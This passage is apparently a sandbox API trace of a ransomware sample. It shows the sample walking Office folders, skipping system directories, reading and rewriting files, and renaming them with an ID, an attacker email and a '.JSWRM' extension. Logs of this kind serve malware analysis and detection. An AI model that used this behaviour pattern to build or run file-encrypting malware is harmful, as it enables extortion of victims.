cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME17.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0117.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0117.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0117.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0117.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME17.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme17.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.111] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=125658) returned 1 [0117.111] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ead0) returned 0x24c1d0 [0117.111] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1ead0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1ead0, lpOverlapped=0x0) returned 1 [0117.121] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.121] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1ead0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1ead0, lpOverlapped=0x0) returned 1 [0117.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.122] CloseHandle (hObject=0x314) returned 1 [0117.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0117.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0117.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0117.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0117.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0117.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0117.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0117.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0117.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME17.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme17.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME17.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme17.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0117.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0117.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0117.123] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20438, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME18.CSS", cAlternateFileName="")) returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2=".") returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="..") returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="...") returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="windows") returned -1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="recovery") returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="perflogs") returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="documents and settings") returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="system volume information") returned -1 [0117.123] lstrcmpiW (lpString1="SCHEME18.CSS", lpString2="msocache") returned 1 [0117.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0117.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME18.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME18.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME18.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0117.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0117.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME18.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME18.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME18.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0117.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0117.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0117.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME18.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme18.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.124] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=132152) returned 1 [0117.124] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20430) returned 0x24c1d0 [0117.125] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x20430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x20430, lpOverlapped=0x0) returned 1 [0117.156] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.156] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x20430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x20430, lpOverlapped=0x0) returned 1 [0117.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.156] CloseHandle (hObject=0x314) returned 1 [0117.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0117.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0117.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0117.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0117.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0117.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0117.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.157] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME18.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme18.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME18.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme18.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0117.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0117.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0117.158] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fff2, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME19.CSS", cAlternateFileName="")) returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2=".") returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="..") returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="...") returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="windows") returned -1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="recovery") returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="perflogs") returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="documents and settings") returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="system volume information") returned -1 [0117.158] lstrcmpiW (lpString1="SCHEME19.CSS", lpString2="msocache") returned 1 [0117.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0117.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME19.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME19.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME19.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0117.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0117.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME19.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME19.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME19.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0117.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0117.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME19.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme19.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.159] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=131058) returned 1 [0117.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fff0) returned 0x24c1d0 [0117.159] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1fff0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1fff0, lpOverlapped=0x0) returned 1 [0117.225] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.225] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1fff0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1fff0, lpOverlapped=0x0) returned 1 [0117.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.226] CloseHandle (hObject=0x314) returned 1 [0117.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0117.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0117.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0117.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0117.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0117.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0117.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0117.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0117.226] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME19.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme19.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME19.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme19.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0117.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0117.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.227] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab4f04e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab4f04e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f6f0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME20.CSS", cAlternateFileName="")) returned 1 [0117.227] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2=".") returned 1 [0117.227] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="..") returned 1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="...") returned 1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="windows") returned -1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="recovery") returned 1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="perflogs") returned 1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="documents and settings") returned 1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="system volume information") returned -1 [0117.228] lstrcmpiW (lpString1="SCHEME20.CSS", lpString2="msocache") returned 1 [0117.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0117.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME20.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME20.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME20.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0117.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0117.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME20.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME20.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME20.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0117.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0117.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0117.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0117.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME20.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme20.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.229] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=128752) returned 1 [0117.229] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.229] RtlAllocateHeap (HeapHandle=0x1e0000, 